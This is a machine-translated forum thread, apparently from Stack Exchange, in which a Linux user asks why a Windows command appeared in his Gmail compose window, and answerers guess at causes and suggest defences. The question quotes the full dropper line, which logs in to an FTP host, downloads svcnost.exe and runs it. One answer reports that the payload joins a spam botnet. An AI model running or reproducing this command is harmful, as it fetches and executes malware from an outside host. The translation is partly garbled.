Wie kann ich feststellen, ob mein Linux-Computer gehackt wurde?

Mein Heim-PC ist normalerweise eingeschaltet, aber der Monitor ist ausgeschaltet. Heute Abend kam ich von der Arbeit nach Hause und fand einen Hackversuch: In meinem Browser war mein Google Mail-Konto geöffnet (das war ich), aber es war im Kompositionsmodus mit den folgenden Inhalten TO Feld:

md / c echo open cCTeamFtp.yi.org 21 & gt; & gt; ik & amp; echo user ccteam10 765824 & gt; & gt; ik & amp; binäres Echo & gt; & gt; ik & amp; echo get svcnost.exe & gt; & gt; ik & amp; Echo bye & gt; & gt; ik & amp; ftp -n -v -s: ik & amp; del ik & amp; svcnost.exe & amp;   Echo Du hast gehört

Das sieht für mich nach Windows-Befehlszeilencode aus, und der md Der Start des Codes in Verbindung mit der Tatsache, dass sich Google Mail im Erstellungsmodus befand, zeigt, dass jemand versucht hat, eine cmd Befehl. Ich schätze, ich hatte Glück, dass ich Windows nicht auf diesem PC ausführe, aber ich habe andere, die dies tun. Dies ist das erste Mal, dass mir so etwas passiert ist. Ich bin kein Linux-Guru und habe zu diesem Zeitpunkt außer Firefox keine anderen Programme ausgeführt.

Ich bin mir absolut sicher, dass ich das nicht geschrieben habe und niemand anderes physisch an meinem Computer war. Außerdem habe ich kürzlich mein Google-Passwort (und alle meine anderen Passwörter) in so etwas wie geändert vMA8ogd7bv Ich glaube nicht, dass jemand mein Google-Konto gehackt hat.

Was ist gerade passiert? Wie kann jemand Tastatureingaben auf meinem Computer ausführen, wenn nicht auf dem alten Windows-Computer von Oma seit Jahren Malware ausgeführt wird, sondern auf einem kürzlich neu installierten Ubuntu?

Aktualisieren:
Lassen Sie mich einige der Punkte und Fragen ansprechen:

• Ich bin in Österreich, auf dem Land. Mein WLAN Router läuft WPA2 / PSK und ein mittelstarkes Passwort, das nicht im Wörterbuch enthalten ist; müsste brachial und weniger als 50 Meter von hier sein; Es ist unwahrscheinlich, dass es gehackt wurde.
• Ich verwende eine USB-Tastatur, daher ist es sehr unwahrscheinlich, dass sich jemand in Reichweite befindet, um sie zu hacken.
• Ich habe meinen Computer zu der Zeit nicht benutzt. es war nur zu Hause im Leerlauf, während ich bei der Arbeit war. Da es sich um einen am Monitor montierten Nettop-PC handelt, schalte ich ihn selten aus.
• Die Maschine ist nur zwei Monate alt, läuft nur mit Ubuntu und ich benutze keine seltsame Software oder besuche seltsame Seiten. Es geht hauptsächlich um Stack Exchange, Google Mail und Zeitungen. Keine Spiele. Ubuntu soll sich auf dem Laufenden halten.
• Mir ist nicht bekannt, dass ein VNC-Dienst ausgeführt wird. Ich habe keinesfalls eines installiert oder aktiviert. Ich habe auch keine anderen Server gestartet. Ich bin mir nicht sicher, ob in Ubuntu standardmäßig welche ausgeführt werden?
• Ich kenne alle IP-Adressen in der Google Mail-Kontoaktivität. Ich bin mir ziemlich sicher, dass Google kein Eingang ist.
• Ich habe einen ... gefunden Protokolldatei-Viewer , aber ich weiß nicht, wonach ich suchen soll. Hilfe?

Was ich wirklich wissen möchte, und was mich wirklich unsicher macht, ist: Wie kann jemand aus dem Internet Tastatureingaben auf meinem Computer generieren? Wie kann ich das verhindern, ohne alles darüber zu wissen? Ich bin kein Linux-Freak, sondern ein Vater, der sich seit über 20 Jahren mit Windows beschäftigt und es satt hat. Und in all den über 18 Jahren, in denen ich online war, habe ich noch nie einen Hackversuch gesehen. Das ist also neu für mich.

Ich bezweifle, dass Sie sich Sorgen machen müssen. Es war mehr als wahrscheinlich ein JavaScript-Angriff, der versuchte, eine Fahren Sie per Download . Wenn Sie dies befürchten, beginnen Sie mit NoScript und Adblock Plus Firefox-Add-Ons.

Selbst wenn Sie vertrauenswürdige Websites besuchen, sind Sie nicht sicher, da dort JavaScript-Code von Drittanbietern ausgeführt wird, der böswillig sein kann.

Ich packte es und ließ es in einer VM laufen. Es hat mirc installiert und dies ist das Statusprotokoll ... http://pastebin.com/Mn85akMk

Es ist ein automatisierter Angriff, der versucht, Sie dazu zu bringen, mIRC herunterzuladen und sich einem Botnetz anzuschließen, das Sie in einen Spambot verwandelt. Meine VM hat sich angeschlossen und eine Verbindung zu einer Reihe verschiedener entfernter Adressen hergestellt, von denen eine ist autoemail-119.west320.com.

Unter Windows 7 musste ich die UAC-Eingabeaufforderung akzeptieren und den Zugriff über die Firewall zulassen.

Es scheint Unmengen von Berichten über diesen genauen Befehl in anderen Foren zu geben, und jemand sagt sogar, dass eine Torrent-Datei versucht hat, ihn auszuführen, als der Download abgeschlossen war ... Ich bin mir jedoch nicht sicher, wie das möglich wäre.

Ich habe dies selbst nicht verwendet, aber es sollte Ihnen die aktuellen Netzwerkverbindungen anzeigen können, damit Sie sehen können, ob Sie mit etwas außerhalb der Norm verbunden sind: http://netactview.sourceforge.net/download.html

Ich bin einverstanden mit @ jb48394 dass es wahrscheinlich ein JavaScript-Exploit ist, wie alles andere in diesen Tagen.

Die Tatsache, dass es versucht, eine zu öffnen cmd Fenster (sehen @ Torbengbs Kommentar ) und führen Sie einen böswilligen Befehl aus, anstatt den Trojaner diskret im Hintergrund herunterzuladen, was darauf hindeutet nutzt eine Sicherheitslücke in Firefox aus, die die Eingabe von Tastatureingaben ermöglicht, jedoch keine Code-Ausführung.

Dies erklärt auch, warum dieser Exploit war deutlich Exklusiv für Windows geschrieben, würde auch unter Linux funktionieren: Firefox führt JavaScript in allen Betriebssystemen auf dieselbe Weise aus (Zumindest versucht es :)) . Wenn es durch einen Pufferüberlauf oder einen ähnlichen für Windows bestimmten Exploit verursacht worden wäre, wäre das Programm nur abgestürzt.

Woher der JavaScript-Code stammt - wahrscheinlich eine böswillige Google-Anzeige (Anzeigenzyklus in Google Mail über den Tag verteilt) . Es würde nicht Sein das zuerst Zeit .

ich fand ein ähnlicher Angriff auf einem anderen Linux-Rechner. Es scheint eine Art FTP-Befehl für Windows zu sein.

Dies beantwortet nicht Ihre ganze Frage, sondern sucht in der Protokolldatei nach fehlgeschlagenen Anmeldeversuchen.

Wenn Ihr Protokoll mehr als fünf fehlgeschlagene Versuche enthält, hat jemand versucht zu knacken root. Wenn erfolgreich versucht wurde, sich anzumelden root während du nicht an deinem Computer warst, ändere sofort dein Passwort !! Ich meine JETZT! Am liebsten etwas alphanumerisches und ca. 10 Zeichen lang.

Mit den Nachrichten, die Sie erhalten haben (die echo Kommandos) Das klingt wirklich wie etwas Unreifes Drehbuch Kiddie . Wenn es ein echter Hacker wäre, der weiß, was er tut, würden Sie wahrscheinlich immer noch nichts davon wissen.

whois Berichte west320.com steht im Eigentum von Microsoft.

UPnP und Vino (System - & gt; Einstellungen - & gt; Remotedesktop) kombiniert mit einem schwachen Ubuntu-Passwort?

Haben Sie nicht standardmäßige Repositorys verwendet?

DEF CON Jedes Jahr findet ein Wi-Fi-Wettbewerb statt, bei dem es darum geht, wie weit ein Wi-Fi-Zugangspunkt entfernt ist - das letzte Mal, dass ich davon hörte, waren es 250 Meilen.

Wenn Sie wirklich Angst haben möchten, sehen Sie sich die Screenshots eines Command-n-Control-Centers von a an Zeus-Botnetz . Keine Maschine ist sicher, aber Firefox unter Linux ist sicherer als die anderen. Noch besser, wenn du rennst SELinux .